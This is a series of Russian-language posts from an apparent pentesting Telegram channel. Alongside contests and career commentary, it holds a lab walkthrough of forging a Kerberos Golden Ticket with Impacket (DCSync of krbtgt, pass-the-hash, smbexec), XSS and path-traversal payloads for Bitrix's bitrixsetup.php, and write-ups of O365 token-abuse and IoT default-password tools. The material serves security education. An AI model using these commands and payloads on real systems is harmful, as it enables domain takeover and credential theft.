Судя по всему, статуэтка победителя #pentestaward не только радует глаз, но и пригождается в хозяйстве у наших призеров. Если хотите также, не пропустите анонс нового сезона премии для этичных хакеров!

Уже скоро опубликуем подробности 😉
* обязательно со звуком

🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

Если тебе всё ещё интересен экзамен академии PortSwigger, то я выпустил исправленную версию своей работы и рассказал немного о себе 😳

Подробнее

ИБ != деньги
#мысли

Постоянно слышу вопросы, почему вот безопасникам или конкретно пентестерам платят мало. Давайте напишу своё мнение, которое вполне логичное:

1. Самая банальная причина, что бюджеты не резиновые. За последние года компании явно стали больше выделять на ИБ, это видно как и по улучшение общей защищенности РФ компаний. Так и по кол-ву компаний, которые открываются в сфере ИБ и переживаю первые 1-3 года, после основания
2. Деньги платит бизнес. Бизнес деньги получает с продаж. Следовательно получают больше те, кто эти продажи обеспечивают. В первую очередь наверное сейлы/пресейлы, затем разработчики, которые собственно и разрабатывают эти продукты. Аналитиков тоже в обиду не дают, когда они реально увеличивают прибыль компании. А мы, безопасники, не приносим прибыль, не беря консалтинговые услуги. Мы предотвращаем потерю этих денег. Не все безопасники, могут аргументировать бизнесу почему та или иная уязвимость для них приоритетна, помимо остальных "горящих" задач. Как мне вчера сказал один человек, "надо продавать бизнесу страх". Особенно на фоне оборотных штрафов, продавать этот страх бизнесу легко, главное знать кому и что.
3. Да, порог входа довольно высокий, но с каждым годом обучающих материалов становится всё больше и больше, а следовательно порог входа становится более мягкий. И даже сейчас у меня появляется ощущение, что пентесты делают все кому не лень, если говорить про низко-среднее качество и к сожалению это не только моё мнение.

📌 Бонус от меня:
ИБ надо любить. Я из тех людей, кто считает, чтобы долго работать в одном направлении его надо любить и не только за деньги. ИБ интересна своей сложностью, но пока вы дойдете до того уровня, когда сможете хоть чуть-чуть разжать булки, надо очень очень много работать и набивать шишки.

Этот пост может вызвать холивар, но я его написал с целью кидаться им в тех, кто говорит, мол почему в ИБ мало платят. Сегодня вот написали, что джуны в пентесте получают, как сотрудники в Теремке) Ну если нравится больше печь блины, то можно и в Теремке работать ;)

🌚 @poxek

🐣 Телеграм заскамился

Так я решил час назад, когда после оплаты гифта подписчику, он ему не пришёл, а деньги списались)
Но сейчас гифт дошёл, но я ему через бота купил другой уже, который сразу активировался у него.

Итого: у нас 1 телеграм премиум на полгода 💫

Чтобы его получить, надо просто прислать в чат смешной мем ПоИБэ, а насколько он годный оценит сами участники чата. Когда будете отправлять, обязательно тегните меня и поставьте #хочупремку. Мем должен быть уникальный, взять чужой не выйдет, я буду проверять)

Время: до сегодняшнего вечера

#meme #хочупремку

🌚 @poxek

🐈 Конкурс закончился!

Хотел до написания поста отдать ссылку на активацию премки телеги, но телега снова скаманула :D Хоть и написано, что её можно передавать кому угодно до активации, по факту передавать не получится, т.к. я вижу у себя в стате что ссылка не активировалась, но активировать не получатель её не смог(

Рад, что Вы так активно боролись за подписку. Критерии для оценки были такие:
1. Смешной ли мем мне и чату?
2. Его оригинальность
3. Реализм/жизненность
4. Наличие премки у участника

По сему победила дружба :D
но выбрать надо было одного, поэтому выбрал двух)) Дада, победили двое подписчиков!!

@smi1e_off — годные мемы:
Первый - Try Harder by OffSec
Второй - мемы под посты всегда кайф))

@fanofbtc — годные мемы:
Первый - бесконечно можно быть первым, ауф
Второй - тут лично у меня жиза

Ещё очень годный мем от вредмастера, но ему уже подписку дарил, а она не успела закончиться))
Но дабы он не дулся, оставлю ссылку на его канал @wr3dmast3rvs, т.к. он пишет годные хардовые статьи по веб-пентесту и вообще он молодец)

🌚 @poxek

Однажды придя просто послушать лекции в каком-то ВУЗе, так получилось, что сначала нашёл уже бывшего коллегу по работе и в целом первую работу пентестером. А потом, в приватной обстановке, с ранее не знакомыми ребятами заобщался и как-то вот уже 2 года дружим, я ходил к ним выступать уже, а они, который год создают атмосферное и активное ИБ комьюнити в МИРЭА.
#ctf #mirea #кибхак

🕛 Сейчас у студенческого сообщества КибХак планируется проведение CTF-соревнования
Мероприятие проводится в онлайн-формате в командном режиме до 5 человек включительно, в качестве партнеров выступает Wildberries

❓Что нужно для участия?
Заполнить форму и зарегистрироваться на платформе https://event.kibhackctf.ru/

❓А какие призы?
🥇40 тыс рублей
🥈30 тыс. рублей
🥉20 тыс. рублей
Помимо этого все команды-победители получат призы от партнеров мероприятия 😉

❗️Призовые места могут занять только команды, состоящие из студентов любых университетов/колледжей РФ

Телеграм канал и чат CTF @kibhackctf

🌚 @poxek

😑 Genzai
#IoT #ИнтернетВещей #red_team

Genzai помогает найти панели управления, связанные с IoT / Интернета вещей, по одной или нескольким целям, а также проверить их на наличие паролей по умолчанию и потенциальных уязвимостей на основе путей и версий.

📊 Features:
⚪️Беспроводной маршрутизатор
⚪️Камера наблюдения
⚪️HMI (человеко-машинный интерфейс)
⚪️Интеллектуальное управление питанием
⚪️Система контроля доступа в здание (СКУД)
⚪️Климатический контроль
⚪️Промышленная автоматизация
⚪️Автоматизация дома
⚪️Система очистки воды

💻 Github

🌚 @poxek

😱 Уязвимости в установщике Битрикс

Для установки Битрикса есть скрипт bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.

Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:

XSS:

https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>

LFR:

https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd 

Более подробно читайте в статье на хабре.

#web #bitrix #xss #lfr

😑 GraphSpy
#AD #Windows #O365

Инструмент первоначального доступа и последующей эксплуатации для AAD и O365 с GUI на основе браузера.

Написана на python + html/css/js

Установка:

# Установка pipx (пропустите, если уже установлен)
apt install pipx
pipx ensurepath

# Установка GraphSpy
pipx install graphspy

После установки приложение можно запустить с помощью команды graphspy.

Запуск GraphSpy без каких-либо аргументов приведет к запуску по умолчанию по адресу http://127.0.0.1:5000.

У GraphSpy множество функций, так давайте разберемся в них:

Токены доступа и обновления — храните токены доступа и обновления для нескольких пользователей и диапазонов в одном месте. Легко переключайтесь между ними или запрашивайте новые маркеры доступа с любой страницы.

Девайс коды — легко создавайте и опрашивайте сразу несколько кодов устройств. Если пользователь использовал код устройства для аутентификации, GraphSpy автоматически сохранит токен доступа и обновления в своей базе данных.

Файлы и SharePoint — просмотр файлов и папок в OneDrive пользователя или на любом доступном SharePoint с помощью user-friendly интерфейса проводника файлов. Конечно, файлы можно загружать и напрямую. Кроме того, в списке отображаются недавно открытые файлы пользователя или файлы, к которым он имеет общий доступ.

Outlook — можно одним нажатием открывать Outlook использовав только Outlook access token

Графовый поиск — поиск по ключевым словам во всех приложениях Microsoft 365 с помощью Microsoft Search API. Например, поиск любых файлов или электронных писем, содержащих ключевые слова, как "пароль", "конфиденциально" и т.д.

Кастомные запросы — можно выполнять собственные API-запросы к любому endpoint'у, используя токены доступа, хранящиеся в GraphSpy.

Поддержки нескольких БД — GraphSpy поддерживает несколько баз данных. Это удобно при одновременной работе над несколькими проектами, чтобы хранить токены и коды устройств в порядке.

Ну и куда же без нашей любимой тёмной темы)) 🌚

💻 Github

🌚 @poxek